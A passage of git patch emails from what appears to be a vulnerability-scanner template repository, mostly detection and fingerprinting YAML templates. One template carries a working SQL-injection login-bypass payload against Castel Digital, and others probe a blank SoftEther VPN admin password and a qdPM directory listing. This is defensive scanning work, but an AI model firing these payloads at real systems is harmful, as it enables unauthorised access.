/uploads URI. + impact: | + Successful exploitation could allow an attacker to read sensitive files on the server. + remediation: | + Upgrade qdPM to a non-vulnerable version to mitigate the directory traversal vulnerability. + reference: + - https://qdpm.net + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-45855 + cwe-id: CWE-22 + epss-score: 0.00087 + epss-percentile: 0.35946 + cpe: cpe:2.3:a:qdpm:qdpm:9.2:*:*:*:*:*:*:* + metadata: + vendor: qdpm + product: qdpm + shodan-query: http.favicon.hash:762074255 + tags: cve,cve2023,qdpm,lfi,listing + +http: + - method: GET + path: + - "{{BaseURL}}/uploads/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "users" + - "attachments" + condition: and + + - type: status + status: + - 200 From 519d77e5d4ae04165ed8e148966766af8b450d73 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Mon, 13 May 2024 17:23:28 +0300 Subject: [PATCH 184/375] add castel login panel sqli --- .../other/castel-digital-sqli.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/vulnerabilities/other/castel-digital-sqli.yaml diff --git a/http/vulnerabilities/other/castel-digital-sqli.yaml b/http/vulnerabilities/other/castel-digital-sqli.yaml new file mode 100644 index 0000000000..f171d74341 --- /dev/null +++ b/http/vulnerabilities/other/castel-digital-sqli.yaml @@ -0,0 +1,34 @@ +id: castel-digital-sqli + +info: + name: Castel Digital Authentication Bypass + author: Kazgangap + severity: high + description: SQL Injection vulnerability in Castel Digital login forms. + reference: + - https://www.casteldigital.com.br/ + - https://cxsecurity.com/issue/WLB-2024050032 + metadata: + google-query: "Castel Digital" + tags: sqli,webapps + + +http: + - raw: + - | + POST /restrito/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x + + matchers-condition: and + matchers: + - type: word + words: + - "Sistema Web para Imobiliárias e Corretores" + - "Área Restrita" + condition: and + - type: status + status: + - 200 \ No newline at end of file From 721003c0c5e8fadb0343edb66cdca207cc57f0f6 Mon Sep 17 00:00:00 2001 From: Brandon Hutchinson <bhutch@gmail.com> Date: Mon, 13 May 2024 14:40:37 +0000 Subject: [PATCH 185/375] Create softether-vpn-default-login.yaml --- .../softether-vpn-default-login.yaml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/default-logins/softether-vpn-default-login.yaml diff --git a/http/default-logins/softether-vpn-default-login.yaml b/http/default-logins/softether-vpn-default-login.yaml new file mode 100644 index 0000000000..ccab0eea4e --- /dev/null +++ b/http/default-logins/softether-vpn-default-login.yaml @@ -0,0 +1,39 @@ +id: softether-vpn-default-login + +info: + name: SoftEther VPN Admin Console - Default Login + author: bhutch + severity: high + description: | + The administrative password for the SoftEther VPN Server is blank. + reference: + - https://www.softether.org/4-docs/1-manual/3._SoftEther_VPN_Server_Manual/3.3_VPN_Server_Administration#Administration_Authority_for_the_Entire_SoftEther_VPN_Server + metadata: + shodan-query: title:"SoftEther VPN Server" + verified: true + tags: panel,vpn,softether,default-login + +http: + - raw: + - | + GET /admin/default/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + attack: pitchfork + payloads: + username: + - administrator + password: + - + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>SoftEther VPN Server HTML5 Web Administration Console (Under construction!)' + + - type: status + status: + - 200 From 30af5445c0ff2fa70b836a421027b4e3cfb80bf6 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" Date: Mon, 13 May 2024 18:15:09 +0330 Subject: [PATCH 186/375] Add ghost-panel.yaml --- http/exposed-panels/ghost-panel.yaml | 30 ++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/exposed-panels/ghost-panel.yaml diff --git a/http/exposed-panels/ghost-panel.yaml b/http/exposed-panels/ghost-panel.yaml new file mode 100644 index 0000000000..8252a0cefa --- /dev/null +++ b/http/exposed-panels/ghost-panel.yaml @@ -0,0 +1,30 @@ +id: ghost-panel + +info: + name: Ghost Panel - Detect + author: userdehghani + severity: info + description: | + beautiful, modern publishing with email newsletters and paid subscriptions built-in. + reference: + - https://ghost.org/ + metadata: + verified: true + max-request: 1 + tags: panel,ghost,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/ghost/#/signin" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'Ghost Admin' + - 'content="Ghost"' + condition: or + case-insensitive: true \ No newline at end of file From 8aacc67f40047340890e9f50b0a79fc623fb3f2f Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <m.a.dehghani609@gmail.com> Date: Mon, 13 May 2024 18:17:52 +0330 Subject: [PATCH 187/375] Update ghost-panel.yaml --- http/exposed-panels/ghost-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/ghost-panel.yaml b/http/exposed-panels/ghost-panel.yaml index 8252a0cefa..b565dcdc54 100644 --- a/http/exposed-panels/ghost-panel.yaml +++ b/http/exposed-panels/ghost-panel.yaml @@ -27,4 +27,4 @@ http: - '<title>Ghost Admin' - 'content="Ghost"' condition: or - case-insensitive: true \ No newline at end of file + case-insensitive: true From 2a7ac6eb8a79c90d9757fd3983a7a1f1555071f3 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Mon, 13 May 2024 17:49:02 +0300 Subject: [PATCH 188/375] fix matcher --- http/vulnerabilities/other/castel-digital-sqli.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/other/castel-digital-sqli.yaml b/http/vulnerabilities/other/castel-digital-sqli.yaml index f171d74341..c4438fae6b 100644 --- a/http/vulnerabilities/other/castel-digital-sqli.yaml +++ b/http/vulnerabilities/other/castel-digital-sqli.yaml @@ -16,18 +16,23 @@ info: http: - raw: - | - POST /restrito/login HTTP/1.1 + POST /restrito/login/sub/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x + + - | + GET /restrito/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word words: - - "Sistema Web para Imobiliárias e Corretores" - - "Área Restrita" + - "Banner" + - "Construtoras" condition: and - type: status status: From ca34c02f1ac8db1cceda9d675c2e5ecbab73be5a Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 18:39:28 +0330 Subject: [PATCH 189/375] Add imgproxy-detect.yaml --- http/technologies/imgproxy-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 http/technologies/imgproxy-detect.yaml diff --git a/http/technologies/imgproxy-detect.yaml b/http/technologies/imgproxy-detect.yaml new file mode 100644 index 0000000000..ba654a8528 --- /dev/null +++ b/http/technologies/imgproxy-detect.yaml @@ -0,0 +1,24 @@ +id: imgproxy-detect + +info: + name: Imgproxy Detect + author: userdehghani + severity: info + description: | + imgproxy is a fast and secure standalone server for resizing, processing, and converting images. + reference: + - https://imgproxy.net/ + metadata: + verified: true + max-request: 1 + tags: imgproxy,tech,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200 && contains(server, "imgproxy")' From d4ec104bbc5a78fd05f19efd0f4a56302a99bfe4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Mon, 13 May 2024 21:00:13 +0530 Subject: [PATCH 190/375] Update cloudtrail-logs-not-encrypted.yaml --- cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml index 4fc82d8c28..b2cd122a10 100644 --- a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml @@ -14,13 +14,13 @@ info: tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config variables: - region: "ap-south-1" + region: "us-east-1" flow: | code(1) for(let CloudTrail of iterate(template.cloudtrailname)){ set("trail", CloudTrail) - set("region", CloudTrail.trailregion) + set("region", template.trailregion) code(2) } @@ -60,4 +60,3 @@ code: - type: dsl dsl: - '"CloudTrail trail " + trail + " is not configured to encrypt log files using SSE-KMS encryption"' -# digest: 490a004630440220615ff60f92dc1540ae499c543e657c18d430e7b6b08291befb395d465b0dfa280220748efe3b2771beb250f0c50040e94c8c0a9a37f60fcb6c88bbe9ff55b5362fa1:922c64590222798bb761d5b6d8e72950 From adff13fd67d560dd9ec5189dcceecca46a1cb97d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 13 May 2024 21:00:13 +0530 Subject: [PATCH 191/375] Update uni-gui-framework-detection.yaml --- uni-gui-framework-detection.yaml | 41 ++++++++++++++++++++------------ 1 file changed, 26 insertions(+), 15 deletions(-) diff --git a/uni-gui-framework-detection.yaml b/uni-gui-framework-detection.yaml index af1c00c6e3..e40a8a012f 100644 --- a/uni-gui-framework-detection.yaml +++ b/uni-gui-framework-detection.yaml @@ -1,39 +1,50 @@ -id: uni-gui-framework-detection +id: uni-gui-framework -info: - name: Detect UniGUI Framework and Version - author: serrapa - severity: info - description: Checks for the presence of UniGUI framework and extracts its version along with the Sencha Ext JS version. - -requests: +info: + name: UniGUI Framework - Detect + author: serrapa + severity: info + description: | + Checks for the presence of UniGUI framework and extracts its version along with the Sencha Ext JS version. + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"UniGUI" + tags: tech,unigui + +http: - method: GET path: - "{{BaseURL}}/" + host-redirects: true + max-redirects: 2 + matchers-condition: and matchers: - type: word + part: body words: - "uni-xtheme-" - "ext-all.js" - "uniVars._extVer=" condition: or - part: body + - type: regex + part: body regex: - 'uni-(\d+\.\d+\.\d+\.\d+)/' - 'uniVars._extVer="(\d+\.\d+\.\d+)"' - part: body + extractors: - type: regex - regex: - - 'uni-(\d+\.\d+\.\d+\.\d+)/' part: body name: uni_gui_version - - type: regex regex: - - 'uniVars._extVer="(\d+\.\d+\.\d+)"' + - 'uni-(\d+\.\d+\.\d+\.\d+)' + + - type: regex part: body name: ext_js_version - + regex: + - 'uniVars._extVer="(\d+\.\d+\.\d+)"' From 5ac2a9916133b6a6a330022750f98e7442230685 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 23:10:16 +0530 Subject: [PATCH 192/375] Update and rename uni-gui-framework-detection.yaml to http/technologies/uni-gui-framework.yaml --- .../technologies/uni-gui-framework.yaml | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) rename uni-gui-framework-detection.yaml => http/technologies/uni-gui-framework.yaml (69%) diff --git a/uni-gui-framework-detection.yaml b/http/technologies/uni-gui-framework.yaml similarity index 69% rename from uni-gui-framework-detection.yaml rename to http/technologies/uni-gui-framework.yaml index e40a8a012f..5f9d6f5c1d 100644 --- a/uni-gui-framework-detection.yaml +++ b/http/technologies/uni-gui-framework.yaml @@ -37,14 +37,14 @@ http: - 'uniVars._extVer="(\d+\.\d+\.\d+)"' extractors: - - type: regex - part: body - name: uni_gui_version - regex: - - 'uni-(\d+\.\d+\.\d+\.\d+)' + - type: regex + part: body + name: uni_gui_version + regex: + - 'uni-(\d+\.\d+\.\d+\.\d+)' - - type: regex - part: body - name: ext_js_version - regex: - - 'uniVars._extVer="(\d+\.\d+\.\d+)"' + - type: regex + part: body + name: ext_js_version + regex: + - 'uniVars._extVer="(\d+\.\d+\.\d+)"' From 6a7c37fbad312c4e0fedb47a852775013acb67e6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 23:12:07 +0530 Subject: [PATCH 193/375] remove / --- http/technologies/uni-gui-framework.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/uni-gui-framework.yaml b/http/technologies/uni-gui-framework.yaml index 5f9d6f5c1d..a0654b54b3 100644 --- a/http/technologies/uni-gui-framework.yaml +++ b/http/technologies/uni-gui-framework.yaml @@ -15,7 +15,7 @@ info: http: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" host-redirects: true max-redirects: 2 From 00c9169fd001536a083f7c248df0948cbd343e4c Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 17:46:41 +0000 Subject: [PATCH 195/375] Auto Generated New Template Addition List [Mon May 13 17:46:41 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 10db97c58d..1f3f2103a8 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2023/CVE-2023-43374.yaml http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml +http/exposed-panels/matomo-panel.yaml http/exposed-panels/nocodb-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/unleash-panel.yaml @@ -14,4 +15,5 @@ http/technologies/apache/apache-answer-detect.yaml http/technologies/craftercms-detect.yaml http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml +http/technologies/uni-gui-framework.yaml http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml From 7022cc8e3003ffbf7d95e9efe390e3355cc2b6f0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 17:46:49 +0000 Subject: [PATCH 196/375] Auto Generated Templates Checksum [Mon May 13 17:46:49 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 910422913e..b9143dcb97 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -210,7 +210,7 @@ dast/vulnerabilities/ssti/reflection-ssti.yaml:f88426f514ecbe514a5b988b2e826d967 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 dast/vulnerabilities/xss/reflected-xss.yaml:1faff32e9ad4bb73f0476c526f9b6ef6d5a51757 dast/vulnerabilities/xxe/generic-xxe.yaml:54b04c0c3b8d50d6305ed48ac7997f1aeeea426d -dns/azure-takeover-detection.yaml:aa7033fb366a4fb11dc5b575f20908007cda26f2 +dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a dns/bimi-detect.yaml:49b1f8b7289261ba3926483a41fa213f921248f2 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 @@ -4030,7 +4030,7 @@ http/exposed-panels/mailhog-panel.yaml:086f46cbe44037b7a0e98e2de15e3b244478c498 http/exposed-panels/mailwatch-login.yaml:5806b40c7aba9a02c1df2d3984844a3d0fbda20c http/exposed-panels/maltrail-panel.yaml:e64bf45e9330011747c012809705e894700e308b http/exposed-panels/mantisbt-panel.yaml:a79ef369723d43f4d20f4d94abe7bbabec3afa04 -http/exposed-panels/matomo-panel.yaml:83b26c8dc76d00f712f199f43099c80dcad3d208 +http/exposed-panels/matomo-panel.yaml:8e36acccca8cb5c975d38a314c941c22a2204faf http/exposed-panels/mautic-crm-panel.yaml:53a7b87d599c64c95672e30524f3c8bfe053160d http/exposed-panels/memos-panel.yaml:889e1696bded69cb5833dc1cd22b44ac49318773 http/exposed-panels/meshcentral-login.yaml:6112dd7a01bf42c06b47b029f3aafb08d85f7ee0 @@ -6939,6 +6939,7 @@ http/technologies/tinyproxy-detect.yaml:1f12faf3ae2dd38f5c8f0aed9753d65ce611b795 http/technologies/tor-socks-proxy.yaml:ad664f3598d1039dd335f4128e1cb81ceeef4864 http/technologies/tornado-server-login.yaml:7d8148d6ca18ef79abc33aceacbf8dbafd31d4d4 http/technologies/typo3-detect.yaml:206df0bc720861958780557535b8b4693ec64636 +http/technologies/uni-gui-framework.yaml:9f59eba6c4872958ade6e9f88eb08273d11708bc http/technologies/utility-service-detect.yaml:c6754cc4daf389f30429c27e153462cc4b5f65a4 http/technologies/vbulletin-detect.yaml:a48f02b03dc57037391b6c02e06f20906b9d9015 http/technologies/versa/versa-analytics-server.yaml:ab6b798c55d8379b64cd1bc97b70ee6377f151e5 @@ -8516,7 +8517,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:11807a89775af584dc3410d74f2576e8276bde19 +templates-checksum.txt:6666fc76c5385448f1e5ec6b44a709d427a1c2d7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7d4cf05051ff12118e2c930ab1bbb798a5ffa6c6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 17:47:22 +0000 Subject: [PATCH 197/375] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ad1014d6de..d171f57fa8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' + - 'http/exposed-panels/matomo-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' @@ -19,6 +20,7 @@ on: - 'http/technologies/craftercms-detect.yaml' - 'http/technologies/statamic-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' + - 'http/technologies/uni-gui-framework.yaml' - 'http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml' workflow_dispatch: jobs: From 4f5634538fa31593534cda800bed51a9c08b43fb Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 17:48:30 +0000 Subject: [PATCH 198/375] Auto Template Signing [Mon May 13 17:48:30 UTC 2024] :robot: --- http/technologies/uni-gui-framework.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/uni-gui-framework.yaml b/http/technologies/uni-gui-framework.yaml index a0654b54b3..b004c0dc86 100644 --- a/http/technologies/uni-gui-framework.yaml +++ b/http/technologies/uni-gui-framework.yaml @@ -48,3 +48,4 @@ http: name: ext_js_version regex: - 'uniVars._extVer="(\d+\.\d+\.\d+)"' +# digest: 490a0046304402206a748c936bf19bbd442ca7a03f7e7b4d7947a2a385b1b49e7f308d20a043cf5f022016ae7660962c0a4e9421084b61ff85f7490145cb44206622d7a369d80751e1ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 681dff2a5242d16fdc2ccbc10a9e51eecb4e69fa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 17:49:15 +0000 Subject: [PATCH 200/375] Auto Generated Templates Checksum [Mon May 13 17:49:15 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b9143dcb97..fca54f8306 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -19,7 +19,7 @@ cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml:71aafc94886bc0bf1ad799a59043ccb14c cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml:0fdecbb14773ede92defb5550f8b6f280675ae77 cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml:4e6f15779999587b4ebbcf8b0ddc523155decb48 cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml:2493c4d57eef3d147cf93ffd7a492cfc409f1426 -cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:8c6cf3eeb8314189731e7c5925fb8f3b9057f278 +cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:de816d2b05c12627ccb40a388ecf0663767b76ac cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml:ca1a07dc81a0071d64ab7a4d9868367d1c7465ea cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml:c5c333bcd31a6282a913a9cfe7a440566ed1bb78 cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml:4fd566c83837e16dbc3b4db04b840b0abcba2804 @@ -6939,7 +6939,7 @@ http/technologies/tinyproxy-detect.yaml:1f12faf3ae2dd38f5c8f0aed9753d65ce611b795 http/technologies/tor-socks-proxy.yaml:ad664f3598d1039dd335f4128e1cb81ceeef4864 http/technologies/tornado-server-login.yaml:7d8148d6ca18ef79abc33aceacbf8dbafd31d4d4 http/technologies/typo3-detect.yaml:206df0bc720861958780557535b8b4693ec64636 -http/technologies/uni-gui-framework.yaml:9f59eba6c4872958ade6e9f88eb08273d11708bc +http/technologies/uni-gui-framework.yaml:24da39f35b8c52b287e5c62359c6bdfffafc32a2 http/technologies/utility-service-detect.yaml:c6754cc4daf389f30429c27e153462cc4b5f65a4 http/technologies/vbulletin-detect.yaml:a48f02b03dc57037391b6c02e06f20906b9d9015 http/technologies/versa/versa-analytics-server.yaml:ab6b798c55d8379b64cd1bc97b70ee6377f151e5 @@ -8517,7 +8517,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6666fc76c5385448f1e5ec6b44a709d427a1c2d7 +templates-checksum.txt:4950e75d142c90a986cb044a223fd568225adc38 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 42cfb21d39fa9b83c70635e720976f98d79b7e12 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 17:51:00 +0000 Subject: [PATCH 201/375] Auto Template Signing [Mon May 13 17:51:00 UTC 2024] :robot: --- cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml index b2cd122a10..84ca11eca2 100644 --- a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml @@ -60,3 +60,4 @@ code: - type: dsl dsl: - '"CloudTrail trail " + trail + " is not configured to encrypt log files using SSE-KMS encryption"' +# digest: 4b0a00483046022100b39586900f3cb7a7ce2582be709c7b3d1b25bceaf0f6d35887c3a3d62bfff8d80221009aa3a72ddade09b522655349a54b6cb7e6e0ebd3b36d85b30899b283e77dc90d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c409580ea800f6c742d43b0eb1fdd491244e95d4 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Mon, 13 May 2024 20:14:44 +0200 Subject: [PATCH 202/375] Add files via upload --- http/exposed-panels/easyvista-panel.yaml | 35 ++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/exposed-panels/easyvista-panel.yaml diff --git a/http/exposed-panels/easyvista-panel.yaml b/http/exposed-panels/easyvista-panel.yaml new file mode 100644 index 0000000000..d21e0aea11 --- /dev/null +++ b/http/exposed-panels/easyvista-panel.yaml @@ -0,0 +1,35 @@ +id: easyvista-panel + +info: + name: EasyVista Login Panel - Detect + author: righettod + severity: info + description: | + EasyVista login panel was detected. + reference: + - https://www.easyvista.com/ + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"Easyvista" + tags: panel,easyvista,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/index.php" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "<title>easyvista apps", "easyvista-bundle.min.js", "packages_com_easyvista_core")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)package:\s+"([a-z0-9._-]+)"' + - '(?i)version : ([a-z0-9._-]+)' \ No newline at end of file From 180bde320888216e39c9ea55b1f11d7ac931754a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 14 May 2024 02:26:35 +0530 Subject: [PATCH 203/375] Update warp-malware.yaml --- file/malware/warp-malware.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/malware/warp-malware.yaml b/file/malware/warp-malware.yaml index bcf2e9b53a..117474c917 100644 --- a/file/malware/warp-malware.yaml +++ b/file/malware/warp-malware.yaml @@ -18,7 +18,7 @@ file: - "/2011/n325423.shtml?" - "wyle" - "\\~ISUN32.EXE" - condition: or + condition: and - type: binary binary: From f2caf227f37a9dcc4387a8203d7231377654614c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 09:16:22 +0530 Subject: [PATCH 204/375] updated matcher & info --- http/cves/2023/CVE-2023-45855.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml index d3c814f700..db33f12afc 100644 --- a/http/cves/2023/CVE-2023-45855.yaml +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -1,16 +1,18 @@ id: CVE-2023-45855 info: - name: qdPM 9.2 Directory Traversal Vulnerability + name: qdPM 9.2 - Directory Traversal author: DhiyaneshDk severity: high - description: qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the /uploads URI. + description: | + qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the /uploads URI. impact: | Successful exploitation could allow an attacker to read sensitive files on the server. remediation: | Upgrade qdPM to a non-vulnerable version to mitigate the directory traversal vulnerability. reference: - - https://qdpm.net + - https://github.com/SunshineOtaku/Report-CVE/blob/main/qdPM/9.2/Directory%20Traversal.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-45855 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -23,7 +25,7 @@ info: vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 - tags: cve,cve2023,qdpm,lfi,listing + tags: cve,cve2023,qdpm,lfi http: - method: GET @@ -35,8 +37,8 @@ http: - type: word part: body words: - - "users" - - "attachments" + - "Index of /uploads" + - "attachments/" condition: and - type: status From 40d9924bffdc67e06b3b9e4e77bbc2b1cb7bcba9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 03:57:58 +0000 Subject: [PATCH 205/375] Auto Generated New Template Addition List [Tue May 14 03:57:58 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 1f3f2103a8..c2172fbbf9 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml +http/cves/2023/CVE-2023-45855.yaml http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml From 9c3bedf6159113603251d5a103969b525c638b05 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 03:58:07 +0000 Subject: [PATCH 206/375] Auto Generated Templates Checksum [Tue May 14 03:58:07 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index fca54f8306..14b52594f4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -19,7 +19,7 @@ cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml:71aafc94886bc0bf1ad799a59043ccb14c cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml:0fdecbb14773ede92defb5550f8b6f280675ae77 cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml:4e6f15779999587b4ebbcf8b0ddc523155decb48 cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml:2493c4d57eef3d147cf93ffd7a492cfc409f1426 -cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:de816d2b05c12627ccb40a388ecf0663767b76ac 